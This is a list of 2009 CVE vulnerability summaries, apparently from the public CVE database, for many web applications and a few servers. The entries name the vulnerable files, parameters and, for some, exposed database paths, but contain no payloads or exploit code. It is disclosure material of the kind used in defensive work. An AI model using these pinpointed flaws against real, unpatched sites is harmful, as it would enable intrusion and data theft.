[CVE-2009-4989] Cross-site scripting (XSS) vulnerability in index.php in AJ Auction Pro OOPD 3.0 allows remote attackers to inject arbitrary web script or HTML via the txtkeyword parameter in a search action.
[CVE-2009-4984] Multiple cross-site scripting (XSS) vulnerabilities in Accessories Me PHP Affiliate Script 1.4 allow remote attackers to inject arbitrary web script or HTML via the (1) Keywords parameter to search.php and (2) SearchIndex parameter to browse.php.
[CVE-2009-4983] Multiple cross-site scripting (XSS) vulnerabilities in Silurus Classifieds 1.0 allow remote attackers to inject arbitrary web script or HTML via the ID parameter to (1) category.php and (2) wcategory.php, and the (3) keywords parameter to search.php.
[CVE-2009-4980] Multiple cross-site scripting (XSS) vulnerabilities in Photokorn Gallery 1.81 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) where[] parameter to search.php and (2) qc parameter to admin.php.
[CVE-2009-4976] Cross-site scripting (XSS) vulnerability in webkitpart.cpp in kwebkitpart allows remote attackers to inject arbitrary web script or HTML via a URL associated with a nonexistent domain name, related to a "universal XSS" issue, a similar vulnerability to CVE-2010-2536.
[CVE-2009-4975] Cross-site scripting (XSS) vulnerability in webview.cpp in QtDemoBrowser allows remote attackers to inject arbitrary web script or HTML via a URL associated with a nonexistent domain name, related to a "universal XSS" issue, a similar vulnerability to CVE-2010-2536.
[CVE-2009-4972] Cross-site scripting (XSS) vulnerability in index.php (aka the log in page) in SimpleID before 0.6.5 allows remote attackers to inject arbitrary web script or HTML via the s parameter.
[CVE-2009-4963] Cross-site scripting (XSS) vulnerability in the Commerce extension before 0.9.9 for TYPO3 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4956] Cross-site scripting (XSS) vulnerability in the Visitor Tracking (ws_stats) extension before 0.1.2 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4953] Cross-site scripting (XSS) vulnerability in the Userdata Create/Edit (sg_userdata) extension before 0.91.0 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4948] Cross-site scripting (XSS) vulnerability in the Store Locator extension before 1.2.8 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4944] Multiple cross-site scripting (XSS) vulnerabilities in ATRC ACollab 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) address parameter to profile.php or the (2) description parameter to events/add_event.php. NOTE: the provenance of this information is unknown.
[CVE-2009-4941] Cross-site scripting (XSS) vulnerability in sign_in.php in ATRC ACollab 1.2 allows remote attackers to inject arbitrary web script or HTML via the f parameter.
[CVE-2009-4939] Multiple cross-site scripting (XSS) vulnerabilities in index.php in AdPeeps 8.5d1 allow remote attackers to inject arbitrary web script or HTML via the (1) uid parameter, (2) uid parameter in a login_lookup action, (3) uid parameter in an adminlogin action, (4) campaignid parameter in a createcampaign action, (5) type parameter in a view_account_stats action, (6) period parameter in a view_account_stats action, (7) uid parameter in a view_adrates action, (8) accname parameter in an account_confirmation action, (9) loginpass parameter in an account_confirmation action, (10) e9 parameter in a setup_account action, (11) from parameter in an email_advertisers action, (12) message parameter in an email_advertisers action, (13) idno parameter in an edit_ad_package action, (14) Advertiser Name field, (15) First Name field, (16) Last Name field, (17) Address field, (18) Phone Number field, (19) Password Hint field, or (20) URL field.
[CVE-2009-4937] Cross-site scripting (XSS) vulnerability in Small Pirate (SPirate) 2.1 allows remote attackers to inject arbitrary web script or HTML via an onmouseover action in an img BBCode tag within a url BBCode tag.
[CVE-2009-4934] Cross-site scripting (XSS) vulnerability in index.php in Online Photo Pro 2.0 allows remote attackers to inject arbitrary web script or HTML via the section parameter.
[CVE-2009-4933] Multiple SQL injection vulnerabilities in login.php in EZ Webitor allow remote attackers to execute arbitrary SQL commands via the (1) txtUserId (Username) and (2) txtPassword (Password) parameters. NOTE: some of these details are obtained from third party information.
[CVE-2009-4930] Cross-site scripting (XSS) vulnerability in the twbkwbis.P_SecurityQuestion (aka Change Security Question) page in SunGard Banner Student System 7.4 allows remote attackers to inject arbitrary web script or HTML via the New Question field.
[CVE-2009-4926] Multiple cross-site scripting (XSS) vulnerabilities in Online Contact Manager (formerly EContact PRO) 3.0 allow remote attackers to inject arbitrary web script or HTML via the (1) showGroup parameter to (a) index.php and the (2) id parameter to (b) view.php, (c) email.php, (d) edit.php, and (e) delete.php.
[CVE-2009-4910] Cross-site scripting (XSS) vulnerability in the WebVPN portal on Cisco Adaptive Security Appliances (ASA) 5580 series devices with software before 8.1(2) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCsq78418.
[CVE-2009-4908] Multiple cross-site scripting (XSS) vulnerabilities in oBlog allow remote attackers to inject arbitrary web script or HTML via the (1) commentName, (2) commentEmail, (3) commentWeb, or (4) commentText parameter to article.php.
[CVE-2009-4903] Cross-site scripting (XSS) vulnerability in index.php in oBlog allows remote attackers to inject arbitrary web script or HTML via the search parameter. NOTE: the provenance of this information is unknown.
[CVE-2009-4894] Multiple cross-site scripting (XSS) vulnerabilities in profile.php in PunBB before 1.3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) password or (2) e-mail.
[CVE-2009-4892] SQL injection vulnerability in Content Management System WEBjump! allows remote attackers to execute arbitrary SQL commands via the id parameter to (1) portfolio_genre.php and (2) news_id.php.
[CVE-2009-4890] Multiple cross-site scripting (XSS) vulnerabilities in the login application in vBook 4.2.17 allow remote attackers to inject arbitrary web script or HTML via the (1) title and (2) message parameters.
[CVE-2009-4888] Cross-site scripting (XSS) vulnerability in poster.php in PHortail 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the (1) pseudo, (2) email, (3) ti, and (4) txt parameters.
[CVE-2009-4885] Cross-site scripting (XSS) vulnerability in templates/1/login.php in phpCommunity 2 2.1.8 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2009-4882] Cross-site scripting (XSS) vulnerability in zc/publisher/html.rb in ZoneCheck 2.0.4-13 and 2.1.0 allows remote attackers to inject arbitrary web script or HTML via the ns parameter to zc.cgi.
[CVE-2009-4877] Multiple cross-site request forgery (CSRF) vulnerabilities in WebGUI before 7.7.14 allow remote attackers to hijack the authentication of users for unspecified requests via unknown vectors.
[CVE-2009-4873] Stack-based buffer overflow in the HTTP server in Rhino Software Serv-U Web Client 9.0.0.5 allows remote attackers to cause a denial of service (server crash) or execute arbitrary code via a long Session cookie.
[CVE-2009-4869] Cross-site scripting (XSS) vulnerability in index.php in Nasim Guest Book 1.2 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2009-4868] Cross-site scripting (XSS) vulnerability in Hitron Soft Answer Me 1.0 allows remote attackers to inject arbitrary web script or HTML via the q_id parameter to the answers script (aka answers.php). NOTE: some of these details are obtained from third party information.
[CVE-2009-4866] Cross-site scripting (XSS) vulnerability in search.cgi in Matt's Script Archive (MSA) Simple Search 1.0 allows remote attackers to inject arbitrary web script or HTML via the terms parameter. NOTE: some of these details are obtained from third party information.
[CVE-2009-4864] Multiple cross-site scripting (XSS) vulnerabilities in escorts_search.php in I-Escorts Directory Script and Agency Script allow remote attackers to inject arbitrary web script or HTML via the (1) search_name and (2) languages parameters. NOTE: some of these details are obtained from third party information.
[CVE-2009-4861] Cross-site scripting (XSS) vulnerability in shownews.php in SupportPRO SupportDesk 3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2009-4859] Multiple cross-site scripting (XSS) vulnerabilities in Online Work Order Suite (OWOS) Lite Edition 3.10 allow remote attackers to inject arbitrary web script or HTML via the show parameter to (1) default.asp and (2) report.asp, and the (3) go parameter to login.asp.
[CVE-2009-4858] Cross-site scripting (XSS) vulnerability in questiondetail.php in Yahoo Answers Clone allows remote attackers to inject arbitrary web script or HTML via the questionid parameter.
[CVE-2009-4857] Cross-site scripting (XSS) vulnerability in login.php in PHP Photo Vote 1.3F allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2009-4856] Cross-site scripting (XSS) vulnerability in subitems.php in PHP Easy Shopping Cart 3.1R allows remote attackers to inject arbitrary web script or HTML via the name parameter.
[CVE-2009-4853] Multiple cross-site scripting (XSS) vulnerabilities in JumpBox before 1.1.2 for Foswiki Wiki System allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4852] Multiple cross-site scripting (XSS) vulnerabilities in SemanticScuttle before 0.94.1 allow remote attackers to inject arbitrary web script or HTML via the sort parameter to index.php, and other unspecified vectors, a different issue than CVE-2008-6113. NOTE: some of these details are obtained from third party information.
[CVE-2009-4848] Multiple cross-site scripting (XSS) vulnerabilities in ToutVirtual VirtualIQ Pro 3.2 build 7882 and 3.5 build 8691 allow remote attackers to inject arbitrary web script or HTML via the (1) userId parameter to tvserver/server/user/setPermissions.jsp, (2) deptName parameter to tvserver/server/user/addDepartment.jsp, (3) ID parameter to tvserver/server/inventory/inventoryTabs.jsp, (4) reportName parameter to tvserver/reports/virtualIQAdminReports.do, or (5) middleName parameter in a save action to tvserver/user/user.do.
[CVE-2009-4843] ToutVirtual VirtualIQ Pro before 3.5 build 8691 does not require administrative authentication for JBoss console access, which allows remote attackers to execute arbitrary commands via requests to (1) the JMX Management Console or (2) the Web Console.
[CVE-2009-4842] Multiple cross-site scripting (XSS) vulnerabilities in ToutVirtual VirtualIQ Pro 3.5 build 8691 allow remote attackers to inject arbitrary web script or HTML via the (1) addNewDept, (2) deptId, or (3) deptDesc parameter to tvserver/server/user/addDepartment.jsp.
[CVE-2009-4839] Multiple cross-site scripting (XSS) vulnerabilities in Basic Analysis and Security Engine (BASE), possibly 1.4.4 and earlier, allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) admin/base_roleadmin.php, (2) admin/base_useradmin.php, (3) base_conf_contents.php, (4) base_qry_sqlcalls.php, and (5) base_ag_main.php.
[CVE-2009-4837] Multiple cross-site scripting (XSS) vulnerabilities in Basic Analysis and Security Engine (BASE) before 1.4.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) sig[1] parameter to base/base_qry_main.php, or the time[0][1] parameter to (2) base/base_stat_alerts.php or (3) base/base_stat_uaddr.php. NOTE: some of these details are obtained from third party information.
[CVE-2009-4829] Cross-site scripting (XSS) vulnerability in the Automated Logout module 6.x-1.x before 6.x-1.7 and 6.x-2.x before 6.x-2.3 for Drupal allows remote authenticated users with administer autologout privileges to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4825] 8pixel.net Blog 4 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for App_Data/sb.mdb.
[CVE-2009-4824] Unspecified vulnerability in Kolab Webclient before 1.2.0 in Kolab Server before 2.2.3 allows attackers to have an unspecified impact via vectors related to an "image upload form."
[CVE-2009-4823] Cross-site scripting (XSS) vulnerability in frontend/x3/files/fileop.html in cPanel 11.0 through 11.24.7 allows remote attackers to inject arbitrary web script or HTML via the fileop parameter.
[CVE-2009-4822] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Kasseler CMS 1.3.4 allow remote attackers to inject arbitrary web script or HTML via the (1) do, (2) id, and (3) uname parameters.
[CVE-2009-4820] Angelo-Emlak 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for veribaze/angelo.mdb.
[CVE-2009-4814] Cross-site scripting (XSS) vulnerability in Wolfram Research webMathematica allows remote attackers to inject arbitrary web script or HTML via the URI to the MSP script.
[CVE-2009-4813] Cross-site scripting (XSS) vulnerability in myps.php in MyBB (aka MyBulletinBoard) 1.4.10 allows remote attackers to inject arbitrary web script or HTML via the username parameter in a donate action.
[CVE-2009-4812] Wolfram Research webMathematica allows remote attackers to obtain sensitive information via a direct request to the MSP script, which reveals the installation path in an error message.
[CVE-2009-4809] Directory traversal vulnerability in thumbnail.ghp in Easy File Sharing (EFS) Web Server 4.8 allows remote attackers to read arbitrary files via a .. (dot dot) in the vfolder parameter.
[CVE-2009-4804] Cross-site scripting (XSS) vulnerability in the Calendar Base (cal) extension before 1.1.1 for TYPO3, when Internet Explorer 6 is used, allows remote attackers to inject arbitrary web script or HTML via "search parameters."
[CVE-2009-4799] Diskos CMS 6.x stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) artikler_prod.mdb or (2) medlemmer.mdb.
[CVE-2009-4788] Multiple open redirect vulnerabilities in Pligg 1.0.2 and earlier allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the (1) return parameter to pligg/login.php and the (2) HTTP Referer header to user_settings.php.
[CVE-2009-4786] Multiple cross-site scripting (XSS) vulnerabilities in Pligg before 1.0.3 allow remote attackers to inject arbitrary web script or HTML via the HTTP Referer header to (1) admin/admin_config.php, (2) admin/admin_modules.php, (3) delete.php, (4) editlink.php, (5) submit.php, (6) submit_groups.php, (7) user_add_remove_links.php, and (8) user_settings.php.
[CVE-2009-4782] Multiple cross-site scripting (XSS) vulnerabilities in Theeta CMS, possibly 0.01, allow remote attackers to inject arbitrary web script or HTML via the (1) start, (2) forum, and (3) cat parameters to community/thread.php.
[CVE-2009-4780] Multiple cross-site scripting (XSS) vulnerabilities in index.php in phpMyFAQ before 2.5.5 allow remote attackers to inject arbitrary web script or HTML via (1) the lang parameter in a sitemap action, (2) the search parameter in a search action, (3) the tagging_id parameter in a search action, (4) the highlight parameter in an artikel action, (5) the artlang parameter in an artikel action, (6) the letter parameter in a sitemap action, (7) the lang parameter in a show action, (8) the cat parameter in a show action, (9) the newslang parameter in a news action, (10) the artlang parameter in a send2friend action, (11) the cat parameter in a send2friend action, (12) the id parameter in a send2friend action, (13) the srclang parameter in a translate action, (14) the id parameter in a translate action, (15) the cat parameter in a translate action, (16) the cat parameter in an add action, or (17) the question parameter in an add action. NOTE: the provenance of this information is unknown.
[CVE-2009-4772] Unspecified vulnerability in the PayPal Website Payments Standard functionality in the Ubercart module 5.x before 5.x-1.9 and 6.x before 6.x-2.1 for Drupal, when a custom checkout completion message is enabled, allows attackers to obtain sensitive information via unknown vectors.
[CVE-2009-4771] The PayPal Website Payments Standard functionality in the Ubercart module 5.x before 5.x-1.9 and 6.x before 6.x-2.1 for Drupal does not properly validate orders, which allows remote attackers to trigger unspecified "duplicate actions" via unknown vectors.
[CVE-2009-4767] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Plohni Shoutbox 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) input_name and (2) input_text parameters. NOTE: some of these details are obtained from third party information.
[CVE-2009-4766] YP Portal MS-Pro Surumu (aka MS-Pro Portal Scripti) 1.0 and 1.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for galeri/database/db.mdb.
[CVE-2009-4765] CNR Hikaye Portal 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/hikaye.mdb.
[CVE-2009-4760] Winn ASP Guestbook 1.01 Beta stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for data/guestbook.mdb.
[CVE-2009-4746] Cross-site scripting (XSS) vulnerability in index.php in Dreamlevels DreamPoll 3.1 allows remote attackers to inject arbitrary web script or HTML via the recordsPerPage parameter in a poll_default login action.
[CVE-2009-4744] Cross-site scripting (XSS) vulnerability in the Contact module in Exponent CMS 0.97-GA20090213 allows remote attackers to inject arbitrary web script or HTML via the email parameter. NOTE: the provenance of this information is unknown.
[CVE-2009-4743] Multiple cross-site scripting (XSS) vulnerabilities in history-storage.aspx in AfterLogic WebMail Pro 4.7.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) HistoryStorageObjectName and (2) HistoryKey parameters.
[CVE-2009-4740] Directory traversal vulnerability in the Webesse E-Card (ws_ecard) extension 1.0.2 and earlier for TYPO3 has unspecified impact and remote attack vectors.
[CVE-2009-4736] Cross-site scripting (XSS) vulnerability in search.php in CommonSense CMS 5.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2009-4732] SQL injection vulnerability in tt/index.php in TT Web Site Manager 0.5, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the tt_name parameter. NOTE: some of these details are obtained from third party information.
[CVE-2009-4729] Multiple cross-site scripting (XSS) vulnerabilities in x10 Adult Media Script 1.7 allow remote attackers to inject arbitrary web script or HTML via the (1) pic_id parameter to includes/video_ad.php, (2) category parameter to linkvideos_listing.php, (3) id parameter to templates/header1.php, and (4) key parameter to video_listing.php.
[CVE-2009-4728] SQL injection vulnerability in the administrative interface in Questions Answered 1.3 allows remote attackers to execute arbitrary SQL commands via the username parameter. NOTE: some of these details are obtained from third party information.
[CVE-2009-4721] Multiple SQL injection vulnerabilities in Admin/index.asp in Andrews-Web (A-W) BannerAd 1.0 allow remote attackers to execute arbitrary SQL commands via the (1) User and (2) Password parameters. NOTE: some of these details are obtained from third party information.
[CVE-2009-4718] SQL injection vulnerability in visitorduration.php in Gonafish WebStatCaffe allows remote attackers to execute arbitrary SQL commands via the nodayshow parameter. NOTE: the provenance of this information is unknown.
[CVE-2009-4717] Multiple cross-site scripting (XSS) vulnerabilities in Gonafish WebStatCaffe allow remote attackers to inject arbitrary web script or HTML via the (1) host parameter to stat/host.php, nodayshow parameter to (2) mostvisitpage.php and (3) visitorduration.php in stat/, (4) nopagesmost parameter to stat/mostvisitpagechart.php, and date parameter to (5) pageviewers.php, (6) pageviewerschart.php, and (7) referer.php in stat/.
[CVE-2009-4716] Cross-site scripting (XSS) vulnerability in results.php in EDGEPHP EZWebSearch allows remote attackers to inject arbitrary web script or HTML via the language parameter.
[CVE-2009-4715] Cross-site scripting (XSS) vulnerability in rates.php in Real Time Currency Exchange allows remote attackers to inject arbitrary web script or HTML via the Amount parameter.
[CVE-2009-4714] Cross-site scripting (XSS) vulnerability in the quiz module for XOOPS Celepar allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to cadastro_usuario.php.
[CVE-2009-4713] Multiple cross-site scripting (XSS) vulnerabilities in the Qas (aka Quas) module for XOOPS Celepar allow remote attackers to inject arbitrary web script or HTML via (1) the cod_categoria parameter to categoria.php, (2) the opcao parameter to index.php, and the PATH_INFO to (3) categoria.php and (4) index.php.
[CVE-2009-4707] Cross-site scripting (XSS) vulnerability in the [Gobernalia] Front End News Submitter (gb_fenewssubmit) extension 0.1.0 and earlier for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4706] Cross-site scripting (XSS) vulnerability in the Mailform (mailform) extension before 0.9.24 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4705] Cross-site scripting (XSS) vulnerability in the Twitter Search (twittersearch) extension before 0.1.1 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4704] Unspecified vulnerability in the Webesse E-Card (ws_ecard) extension 1.0.2 and earlier for TYPO3 allows remote attackers to obtain sensitive information via unknown vectors.
[CVE-2009-4703] SQL injection vulnerability in the Webesse Image Gallery (ws_gallery) extension 1.0.4 and earlier for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
[CVE-2009-4699] Multiple cross-site scripting (XSS) vulnerabilities in SkaDate Dating allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) admin/auth.php and (2) file_uploader.php.
[CVE-2009-4697] Multiple cross-site scripting (XSS) vulnerabilities in index.php in RadNICS Gold 5 allow remote attackers to inject arbitrary web script or HTML via the (1) order parameter in a ulist action and the (2) fid parameter in a view_forum action.
[CVE-2009-4694] Cross-site scripting (XSS) vulnerability in index.php in RadScripts RadLance Gold 7.5 allows remote attackers to inject arbitrary web script or HTML via the fid parameter in a view_forum action. NOTE: the provenance of this information is unknown.
[CVE-2009-4692] Cross-site scripting (XSS) vulnerability in index.php in RadScripts RadLance Gold 7.5 allows remote attackers to inject arbitrary web script or HTML via the pr parameter in a ulist action.
[CVE-2009-4690] Multiple cross-site scripting (XSS) vulnerabilities in YourFreeWorld Programs Rating Script allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) rate.php and (2) postcomments.php.
[CVE-2009-4689] SQL injection vulnerability in index.php in PHP Shopping Cart Selling Website Script allows remote attackers to execute arbitrary SQL commands via the cid parameter.
[CVE-2009-4688] Multiple cross-site scripting (XSS) vulnerabilities in index.php in PHP Shopping Cart Selling Website Script allow remote attackers to inject arbitrary web script or HTML via the (1) txtkeywords and (2) cid parameters.
[CVE-2009-4686] Cross-site scripting (XSS) vulnerability in account.php in phplemon AdQuick 2.2.1 allows remote attackers to inject arbitrary web script or HTML via the red_url parameter.
[CVE-2009-4685] Cross-site scripting (XSS) vulnerability in celebrities.php in PHP Scripts Now Astrology allows remote attackers to inject arbitrary web script or HTML via the day parameter.
[CVE-2009-4684] Cross-site scripting (XSS) vulnerability in index.php in EZodiak allows remote attackers to inject arbitrary web script or HTML via the sign parameter.
[CVE-2009-4682] Cross-site scripting (XSS) vulnerability in vote.php in Good/Bad Vote allows remote attackers to inject arbitrary web script or HTML via the id parameter in a vote action.
[CVE-2009-4681] Cross-site scripting (XSS) vulnerability in search.php in phpDirectorySource 1.x allows remote attackers to inject arbitrary web script or HTML via the st parameter.
[CVE-2009-4678] Cross-site scripting (XSS) vulnerability in index.php in Winn Guestbook 2.4 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
[CVE-2009-4677] Cross-site scripting (XSS) vulnerability in search.php in phpFK PHP Forum ohne 7.0.4 allows remote attackers to inject arbitrary web script or HTML via the search parameter. NOTE: the provenance of this information is unknown.
[CVE-2009-4667] SQL injection vulnerability in form.php in WebMember 1.0 allows remote authenticated users to execute arbitrary SQL commands via the formID parameter.
[CVE-2009-4666] Multiple PHP remote file inclusion vulnerabilities in Webradev Download Protect 1.0 allow remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[RootPath] parameter to (1) Framework/EmailTemplates.class.php, (2) Customers/PDPEmailReplaceConstants.class.php, and (3) Admin/ResellersManager.class.php in includes/DProtect/.
[CVE-2009-4662] Cross-site scripting (XSS) vulnerability in the WebAccess component in Novell GroupWise 7.0 before 7.03 HP4 and 8.0 before 8.0 SP1 allows remote attackers to inject arbitrary web script or HTML via the User.Theme.index parameter.
[CVE-2009-4655] The dhost web service in Novell eDirectory 8.8.5 uses a predictable session cookie, which makes it easier for remote attackers to hijack sessions via a modified cookie.
[CVE-2009-4651] Multiple cross-site scripting (XSS) vulnerabilities in the Webee Comments (com_webeecomment) component 1.1.1, 1.2, and 2.0 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) color, (2) img, or (3) url BBCode tags in unspecified vectors.
[CVE-2009-4650] SQL injection vulnerability in the Webee Comments (com_webeecomment) component 1.1.1, 1.2, and 2.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the articleId parameter in a default action to index2.php. NOTE: some of these details are obtained from third party information.
[CVE-2009-4649] Multiple cross-site scripting (XSS) vulnerabilities in geccBBlite 0.1 allow remote attackers to inject arbitrary web script or HTML via the postatoda parameter to (1) rispondi.php and (2) scrivi.php, which is not properly handled in forum.php.
[CVE-2009-4647] Cross-site scripting (XSS) vulnerability in Accellion Secure File Transfer Appliance before 7_0_296 allows remote attackers to inject arbitrary web script or HTML via the username parameter, which is not properly handled when the administrator views audit logs.
[CVE-2009-4645] Directory traversal vulnerability in web_client_user_guide.html in Accellion Secure File Transfer Appliance before 8_0_105 allows remote attackers to read arbitrary files via a .. (dot dot) in the lang parameter.
[CVE-2009-4642] gnome-screensaver 2.26.1 relies on the gnome-session D-Bus interface to determine session idle time, even when an Xfce desktop such as Xubuntu or Mythbuntu is used, which allows physically proximate attackers to access an unattended workstation on which screen locking had been intended.
[CVE-2009-4616] Cross-site scripting (XSS) vulnerability in search.php in MYRE Holiday Rental Manager allows remote attackers to inject arbitrary web script or HTML via the cat_id1 parameter.
[CVE-2009-4612] Multiple cross-site scripting (XSS) vulnerabilities in the WebApp JSP Snoop page in Mort Bay Jetty 6.1.x through 6.1.21 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to the default URI under (1) jspsnoop/, (2) jspsnoop/ERROR/, and (3) jspsnoop/IOException/, and possibly the PATH_INFO to (4) snoop.jsp.
[CVE-2009-4611] Mort Bay Jetty 6.x and 7.0.0 writes backtrace data without sanitizing non-printable characters, which might allow remote attackers to modify a window's title, or possibly execute arbitrary commands or overwrite files, via an HTTP request containing an escape sequence for a terminal emulator, related to (1) a string value in the Age parameter to the default URI for the Cookie Dump Servlet in test-jetty-webapp/src/main/java/com/acme/CookieDump.java under cookie/, (2) an alphabetic value in the A parameter to jsp/expr.jsp, or (3) an alphabetic value in the Content-Length HTTP header to an arbitrary application.
[CVE-2009-4610] Multiple cross-site scripting (XSS) vulnerabilities in Mort Bay Jetty 6.x and 7.0.0 allow remote attackers to inject arbitrary web script or HTML via (1) the query string to jsp/dump.jsp in the JSP Dump feature, or the (2) Name or (3) Value parameter to the default URI for the Session Dump Servlet under session/.
[CVE-2009-4608] Cross-site scripting (XSS) vulnerability in Canon IT Solutions Inc. ACCESSGUARDIAN 3.0.14 and earlier, and 3.5.6 and earlier, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to authentication.
[CVE-2009-4607] The command line interface in Overland Storage Snap Server 410 with GuardianOS 5.1.041 runs the "less" utility with a higher-privileged uid than the CLI user and without sufficient restriction on shell escapes, which allows local users to gain privileges using the "!" character within less to access a privileged shell.
[CVE-2009-4606] South River Technologies WebDrive 9.02 build 2232 installs the WebDrive Service without a security descriptor, which allows local users to (1) stop the service via the stop command, (2) execute arbitrary commands as SYSTEM by using the config command to modify the binPath variable, or (3) restart the service via the start command.
[CVE-2009-4603] Unspecified vulnerability in sapstartsrv.exe in the SAP Kernel 6.40, 7.00, 7.01, 7.10, 7.11, and 7.20, as used in SAP NetWeaver 7.x and SAP Web Application Server 6.x and 7.x, allows remote attackers to cause a denial of service (Management Console shutdown) via a crafted request. NOTE: some of these details are obtained from third party information.
[CVE-2009-4602] Cross-site scripting (XSS) vulnerability in the Randomizer module 5.x through 5.x-1.0 and 6.x through 6.x-1.0, a module for Drupal, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4601] Cross-site scripting (XSS) vulnerability in basic_search_result.php in Zeeways ZeeJobsite 3x allows remote attackers to inject arbitrary web script or HTML via the title parameter.
[CVE-2009-4596] Cross-site scripting (XSS) vulnerability in index.php in PHP Inventory 1.2 allows remote attackers to inject arbitrary web script or HTML via the sup_id parameter in a suppliers details action.
[CVE-2009-4594] Unspecified vulnerability in IBM Lotus iNotes (aka Domino Web Access or DWA) before 229.131 for Domino 8.0.x has unknown impact and attack vectors, aka SPR SDOY7RHBNH.
[CVE-2009-4590] Cross-site scripting (XSS) vulnerability in base_local_rules.php in Basic Analysis and Security Engine (BASE) before 1.4.4 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4589] Cross-site scripting (XSS) vulnerability in the Special:Block implementation in the getContribsLink function in SpecialBlockip.php in MediaWiki 1.14.0 and 1.15.0 allows remote attackers to inject arbitrary web script or HTML via the ip parameter.
[CVE-2009-4588] Heap-based buffer overflow in the WindsPlayerIE.View.1 ActiveX control in WindsPly.ocx 3.5.0.0 Beta, 3.0.0.5, and earlier in AwingSoft Awakening Web3D Player and Winds3D Viewer allows remote attackers to cause a denial of service (application crash) or execute arbitrary code via a long SceneUrl property value, a different vulnerability than CVE-2009-2386. NOTE: some of these details are obtained from third party information.
[CVE-2009-4587] Cherokee Web Server 0.5.4 allows remote attackers to cause a denial of service (daemon crash) via an MS-DOS reserved word in a URI, as demonstrated by the AUX reserved word.
[CVE-2009-4586] Multiple cross-site scripting (XSS) vulnerabilities in index.html in Wowd client before 1.3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) sortby, (2) tags, or (3) ctx parameter in a search action.
[CVE-2009-4585] UranyumSoft Listing Service stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for database/db.mdb.
[CVE-2009-4580] Multiple cross-site scripting (XSS) vulnerabilities in Hasta Blog 2.3 allow remote attackers to inject arbitrary web script or HTML via the id parameter to (1) yorumyaz.php and (2) blog.php.
[CVE-2009-4579] Cross-site scripting (XSS) vulnerability in the Artist avenue (com_artistavenue) component for Joomla! and Mambo allows remote attackers to inject arbitrary web script or HTML via the Itemid parameter to index.php.
[CVE-2009-4578] Cross-site scripting (XSS) vulnerability in the Facileforms (com_facileforms) component for Joomla! and Mambo allows remote attackers to inject arbitrary web script or HTML via the Itemid parameter to index.php.
[CVE-2009-4575] Cross-site scripting (XSS) vulnerability in the Q-Personel (com_qpersonel) component 1.0.2 RC2 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the personel_sira parameter in a sirala action to index.php.
[CVE-2009-4573] Multiple cross-site scripting (XSS) vulnerabilities in the Joomulus (mod_joomulus) module 2.0 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the tagcloud parameter in a tags action to (1) tagcloud_ell.swf, (2) tagcloud_eng.swf, (3) tagcloud_por.swf, (4) tagcloud_rus.swf, and possibly (5) tagcloud_jpn.swf. NOTE: the provenance of this information is unknown.
[CVE-2009-4570] Cross-site scripting (XSS) vulnerability in PhpShop 0.8.1 allows remote attackers to inject arbitrary web script or HTML via the order_id parameter in an order/order_print action to the default URI.
[CVE-2009-4568] Cross-site scripting (XSS) vulnerability in Webmin before 1.500 and Usermin before 1.430 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2009-4567] Multiple cross-site scripting (XSS) vulnerabilities in editprofile.php in Viscacha 0.8 Gold allow remote authenticated users to inject arbitrary web script or HTML via the (1) skype, (2) yahoo, (3) aol, (4) msn, or (5) jabber parameter in a profile2 action. NOTE: some of these details are obtained from third party information.
